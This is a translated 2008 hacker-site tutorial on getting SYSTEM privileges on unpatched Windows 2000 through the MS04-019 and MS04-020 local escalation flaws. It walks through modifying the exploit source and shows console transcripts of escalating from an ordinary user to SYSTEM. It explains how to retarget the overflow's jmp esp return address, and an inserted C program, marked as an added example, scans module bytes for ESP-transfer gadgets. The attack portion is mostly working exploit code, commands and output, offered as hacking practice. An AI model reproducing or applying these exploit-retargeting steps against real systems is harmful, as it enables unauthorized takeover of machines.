Modifying the Exploit to Experience the Fun of Local Privilege Escalation - Vulnerability Alert - Black Bar Safety Net

2008-11-05T00:00:00
ID MYHACK58:62200820949
Type myhack58
Reporter 佚名 (Anonymous)
Modified 2008-11-05T00:00:00

Description

Vulnerabilities come like August rain: several have cropped up in one short month, and every security site keeps running the latest one in its headlines, with as much heat as the Olympics. But few of these holes are of any real use to beginners, who would very much like to grow into experts sooner. The good news is that two of them, MS04-019 and MS04-020, are local privilege escalation vulnerabilities we can use easily (only MS04-020 is actually a buffer overflow; MS04-019 abuses a program that already runs as SYSTEM). Because the exploit programs for these vulnerabilities are not universal, I have had to attach the source code, and everyone will have to modify it for their own situation; apologies for the inconvenience.

TIPS: What is a buffer overflow?

A buffer overflow (Buffer Overflow) is public enemy number one in computer security; it has been reported that 50% or more of security vulnerabilities are related to buffer overflows. The root cause is that C/C++ do not check array subscripts for out-of-bounds access. Buffer overflows fall broadly into two classes: heap overflows (Heap Overflow) and stack overflows (Stack Overflow). The MS04-020 vulnerability discussed below is a stack overflow: the exploit overwrites a return address on the subsystem server's stack, which is why it needs a jmp esp address.

MS04-019

Good! Let's look at the true face of the MS04-019 and MS04-020 vulnerabilities. MS04-019 is the "Utility Manager vulnerability could allow code execution"; its full name is the Microsoft Utility Manager local elevation of privilege vulnerability, and it works on every current Windows 2000 system unless the latest patch has been applied. An attacker who successfully exploits it can take complete control of the affected system, including installing programs; viewing, changing, or deleting data; or creating new accounts with full privileges.

This vulnerability can only be used for local privilege escalation, not for remote privilege escalation; a real pity! But Utility Manager is installed by default on Windows 2000, so the range of impact is very large. Although it cannot be used to break into someone else's computer remotely, it comes in handy when you have forgotten the administrator password, as long as you can still log on at the console as an ordinary user (the Win+U shortcut used below needs an interactive desktop).

For the benefit of beginners: the exploit was written by an expert. Unfortunately it does not support Chinese Windows, but the reason is easy to find, and adding Chinese support is not hard.

Below, let's first enjoy the fun of modifying this artifact. The code you need to modify is the following excerpt from the exploit source (the asterisks of the C comments and of char * were lost in this copy and are restored here):

    lang[] = {
        { 0x0c, "Gestionnaire d'utilitaires", "aide de Windows", "Ouvrir" },  /* French */
        { 0x09, "Utility manager", "Windows Help", "Open" },                  /* English */
        ...
    };

    void print_lang(int id)
    {
        char *lang_list[] = { "Neutral", "Arabic", "Bulgarian", "Catalan", "Chinese", "Czech",
                              "Danish", "German", "Greek", "English", "Spanish", "Finnish",
                              "French", "Hebrew", "Hungarian", "Icelandic", "Italian", ...

The first field of each lang[] entry is the Windows primary language ID, and the names in lang_list are in that same order: counting from zero, "French" is name number 12, and 12 in hexadecimal is 0x0c; "English" is number 9, 0x09. So "Chinese" is number 4, and the Chinese entry has the form

    { 0x04, "utility Manager", "Windows Help", "open" },  /* Chinese */

where the three strings are the Chinese-localized Utility Manager window title, the Windows Help window title and the Open button caption (they appear in English here because this copy of the article was translated). They must match exactly what a Chinese Windows 2000 displays, since the exploit matches them against the windows on screen. After modification the code is:

    lang[] = {
        { 0x0c, "Gestionnaire d'utilitaires", "aide de Windows", "Ouvrir" },  /* French */
        { 0x09, "Utility manager", "Windows Help", "Open" },                  /* English */
        { 0x04, "utility Manager", "Windows Help", "open" },                  /* Chinese */
        ...

The last step is to compile the source with VC; it is very simple, only a few clicks, so I'll skip that part. The transformed artifact is born! How is it used?

Microsoft Windows 2000 [Version 5.00.2195]

(C) copyright 1985-2000 Microsoft Corp.

C:\WINNT\system32>whoami

X\Chobit

You can see that this user, Chobit, has only User permissions. But soon you will have SYSTEM privileges! Here we go: press Win (the key between Ctrl and Alt) + U to start Utility Manager, then run the exploit we just modified in the CMD window. The program will prompt that a file cannot be found and ask whether to locate it manually and run it. Choose "Yes", type "CMD" and press "Open", and another CMD starts. Anything special about this CMD? Type whoami and it returns:

Microsoft Windows 2 0 0 0 [Version 5.00.2195]

(C) copyright 1985-2000 Microsoft Corp.

C:\WINNT\system32>whoami

NT AUTHORITY\SYSTEM

Look! This CMD has SYSTEM privileges, and from here you can do whatever you want. The whole exploitation process is just obtaining SYSTEM step by step. But in modifying this artifact we made full use of the knowledge its author left in the source; bold experimentation and innovation are qualities a hacker must have, and something the majority of beginners should work hard at.

TIPS: In the previous issue of Hacker Defense (黑客防线), isno gave a detailed analysis of this vulnerability and provided his own complete exploit; friends who want to study the vulnerability's details or modify the exploit themselves can refer to that issue and its accompanying disc.

MS04-020

This is the "POSIX subsystem could allow code execution" vulnerability; its full name is the Windows POSIX subsystem privilege elevation vulnerability, and it affects all current Windows NT and Windows 2000 systems. An attacker who successfully exploits it can take complete control of the affected system, including installing programs; viewing, changing, or deleting data; or creating new accounts with full privileges.

TIPS: What is the POSIX subsystem, and how does the vulnerability arise?

The Microsoft POSIX subsystem is served by a subsystem server process (psxss.exe) that runs with SYSTEM privileges; when posix.exe runs a program, it communicates with that server through LPC. Unfortunately, if the data posix.exe passes to the server contains an over-long string, it causes a stack overflow in the server, and with carefully constructed strings this yields control with SYSTEM privileges.

Like MS04-019, MS04-020 cannot be used for remote intrusion. But we will not pass up any chance to get SYSTEM privileges, and besides, the MS04-020 exploit is very convenient to use because an expert has already written it. All we have to do is compile the exploit and run it. Let's go!

Now I log on to the computer as an ordinary user and open a CMD window:

Microsoft Windows 2 0 0 0 [Version 5.00.2195]

(C) copyright 1985-2000 Microsoft Corp.

C:\WINNT\system32>whoami

X\Chobit

Then change to the directory holding the compiled exploit and run it; a single simple invocation triggers the overflow:

C:\>cd tools

C:\tools>exploit.exe

Microsoft Windows POSIX Subsystem Local Privilege Escalation Exploit(1

By bkbll (bkbll#cnhonker.net,bkbll#tom.com) http://www.cnhonker.com/

pax: illegal option -- h

Usage: pax -[cimopuvy] [-f archive] [-s replstr] [-t device] [pattern.

pax -r [-cimopuvy] [-f archive] [-s replstr] [-t device] [patte

pax -w [-adimuvy] [-b blocking] [-f archive] [-s replstr] [-t device] [-x format] [pathname...]

pax -r -w [-ilmopuvy] [-s replstr] [pathname...] directory

For more information on pax syntax, see Command Reference Help in the Windows Help file.

Remote addr:0x7ff90000

Microsoft Windows 2000 [Version 5.00.2195]

(C) copyright 1985-2000 Microsoft Corp.

C:\WINNT\system32>whoami

NT AUTHORITY\SYSTEM

C:\WINNT\system32>

SYSTEM privileges, just like that; is this exploit really so easy?! But on another Windows 2000 machine, using the same method, I failed to get SYSTEM. The error message said that the instruction at 0x796e9b53 referenced memory that could not be "written". Isn't 0x796e9b53 the exploit's "#define RETADDR 0x796e9b53 //advapi32.dll jmp esp"? So the problem is definitely in the exploit! That line defines the most critical thing in the overflow: the "return address". If the return address is wrong, the overflow will never succeed. The address of a jmp esp inside advapi32.dll depends on the exact DLL build (service pack and hotfix level) and on the base address the module is loaded at, so an address copied from one machine lands on unrelated bytes on another, and executing those bytes is what produced the crash. What we can do now is first find the correct return address, then recompile the exploit. We can use Jmpesp.exe (a tool written by SUNX for locating jmp esp) to find the address of a jmp esp instruction. Open a new CMD window and type "jmpesp 1 advapi32.dll" (without the quotes):

Microsoft Windows 2000 [Version 5.00.2195]

(C) copyright 1985-2000 Microsoft Corp.

C:\tools>jmpesp 1 advapi32.dll

jmpesp, written by sunx http://www.sunx.org

advapi32.dll BaseAddress:0x796d0000

0x796e7993 [JMP ESP]

0x796ec663 [JMP ESP]

0x796ec68b [JMP ESP]

0x796ee70f [CALL ESP]

0x796f8498 [PUSH ESP; RET]

LoadLibraryA: 0x77e705cf

GetProAddress:0x77e6e6a9

WinExec: 0x77e69c1d

ExitThread: 0x77e65f3b

C:\tools>

See? From the output we get the correct return addresses we need:

0x796e7993 [JMP ESP]

0x796ec663 [JMP ESP]

0x796ec68b [JMP ESP]

These are the jmp esp addresses found on this machine; 0x796e9b53 is simply not among them, no wonder the overflow failed. Having found the cause, modify the exploit and recompile: change "#define RETADDR 0x796e9b53 //advapi32.dll jmp esp" to "#define RETADDR 0x796e7993 //advapi32.dll jmp esp". Any of the three jmp esp addresses would do, and the call esp and push esp; ret addresses also transfer control to the stack and can be substituted if needed. Recompile the exploit, run it again with ordinary-user permissions, and it succeeds: SYSTEM privileges!
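The lesson of the failed run above is that RETADDR is not a constant: the offset of a jmp esp inside advapi32.dll changes with the DLL build, and the address changes again if the module loads at a different base. The C program below is an added example (not code from the article, from SUNX's jmpesp tool, or from bkbll's exploit) showing what such a tool does: it scans a module image for the three control-transfer gadgets jmpesp reports (jmp esp = FF E4, call esp = FF D4, push esp; ret = 54 C3), checks whether a candidate RETADDR really holds a jmp esp, and flags addresses containing a NUL byte, which would truncate the string the exploit passes through pax. The image here is a constructed byte sequence with those opcodes at known offsets, scanned at the base 0x796d0000 from the jmpesp output; on a real target you would feed it the bytes of the module as loaded in memory (after LoadLibrary of the DLL on that machine), so that base + offset is a virtual address. Scanning the DLL file on disk instead would need the section table to translate file offsets, which this example does not do.

```c
/* Added example: scan a loaded module image for gadgets that transfer
 * control to ESP, and sanity-check a candidate RETADDR before using it.
 * Not code from the article, from the jmpesp tool, or from the exploit. */
#include <stdio.h>
#include <stddef.h>
#include <stdint.h>
#include <string.h>

typedef struct {
    uint32_t addr;     /* virtual address: module base + offset */
    const char *name;  /* which gadget was matched */
} gadget_t;

/* Two-byte opcode patterns reported by the jmpesp tool. */
static const struct {
    unsigned char op[2];
    const char *name;
} PATTERNS[] = {
    { { 0xFF, 0xE4 }, "JMP ESP" },
    { { 0xFF, 0xD4 }, "CALL ESP" },
    { { 0x54, 0xC3 }, "PUSH ESP; RET" },
};

/* Constructed stand-in for a module's code bytes loaded at SAMPLE_BASE:
 * a few x86 instructions with the three gadgets at offsets 5, 9 and 13. */
const unsigned char SAMPLE_IMAGE[] = {
    0x55, 0x8B, 0xEC,        /* push ebp; mov ebp,esp   (offset 0)  */
    0x90, 0x90,              /* nop; nop                (offset 3)  */
    0xFF, 0xE4,              /* jmp esp                 (offset 5)  */
    0xC3, 0x90,              /* ret; nop                (offset 7)  */
    0x54, 0xC3,              /* push esp; ret           (offset 9)  */
    0x33, 0xC0,              /* xor eax,eax             (offset 11) */
    0xFF, 0xD4,              /* call esp                (offset 13) */
    0xC2, 0x08, 0x00,        /* ret 8                   (offset 15) */
};
#define SAMPLE_LEN  (sizeof SAMPLE_IMAGE)
#define SAMPLE_BASE 0x796d0000u   /* advapi32.dll base shown by jmpesp in the article */

/* Scan buf (len bytes, loaded at base) for the patterns; write up to
 * max_out hits to out (in address order) and return the total found. */
size_t find_gadgets(const unsigned char *buf, size_t len, uint32_t base,
                    gadget_t *out, size_t max_out)
{
    size_t n = 0;
    for (size_t i = 0; i + 1 < len; i++) {
        for (size_t p = 0; p < sizeof PATTERNS / sizeof PATTERNS[0]; p++) {
            if (buf[i] == PATTERNS[p].op[0] && buf[i + 1] == PATTERNS[p].op[1]) {
                if (n < max_out) {
                    out[n].addr = base + (uint32_t)i;
                    out[n].name = PATTERNS[p].name;
                }
                n++;
            }
        }
    }
    return n;
}

/* Does addr really hold FF E4 in this image? A RETADDR copied from another
 * build lands on unrelated bytes; executing them is what produced the
 * "referenced memory could not be written" crash described in the article. */
int is_jmp_esp_at(const unsigned char *buf, size_t len, uint32_t base, uint32_t addr)
{
    if (addr < base || (size_t)(addr - base) + 2 > len)
        return 0;
    size_t off = addr - base;
    return buf[off] == 0xFF && buf[off + 1] == 0xE4;
}

/* The exploit delivers the return address inside a C string (a pax
 * argument), so none of its four little-endian bytes may be 0x00. */
int usable_in_c_string(uint32_t addr)
{
    for (int i = 0; i < 4; i++)
        if (((addr >> (8 * i)) & 0xFFu) == 0)
            return 0;
    return 1;
}

int main(void)
{
    gadget_t found[16];
    size_t n = find_gadgets(SAMPLE_IMAGE, SAMPLE_LEN, SAMPLE_BASE, found, 16);
    for (size_t i = 0; i < n; i++)
        printf("0x%08x [%s]%s\n", (unsigned)found[i].addr, found[i].name,
               usable_in_c_string(found[i].addr) ? "" : "  <- contains NUL, unusable");
    printf("stale RETADDR 0x796e9b53 is a jmp esp here: %s\n",
           is_jmp_esp_at(SAMPLE_IMAGE, SAMPLE_LEN, SAMPLE_BASE, 0x796e9b53u) ? "yes" : "no");
    return 0;
}
```

Pick any reported jmp esp address (or a call esp / push esp; ret one, which also lands execution on the stack) that passes usable_in_c_string, and put it in the "#define RETADDR" line before recompiling; run the scan on the target's own copy of advapi32.dll, not on a different machine's.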

Note that, whether it succeeds or not, this overflow program can be run only once. After the call into the POSIX subsystem, posix.exe waits for a reply on its own LPC port, while the shellcode running inside the subsystem server exits its thread with ExitThread(), so posix.exe and pax are left hanging. If you kill them with pskill, the server (psxss.exe) then freezes waiting on its three LPC ports. The subsystem server can only be started once; after it is killed it cannot be run again, so to overflow again the machine must be restarted. Practise on a machine you are free to reboot.

With the exploits that experts have already written, using the MS04-019 and MS04-020 vulnerabilities to obtain SYSTEM privileges is not a difficult task. But what I felt throughout this exercise is that the joy after a successful overflow comes not from getting SYSTEM privileges but from discovering and solving problems along the way. I am only a beginner, but I think hacking skill accumulates slowly through finding new problems and working to solve them. Don't you think?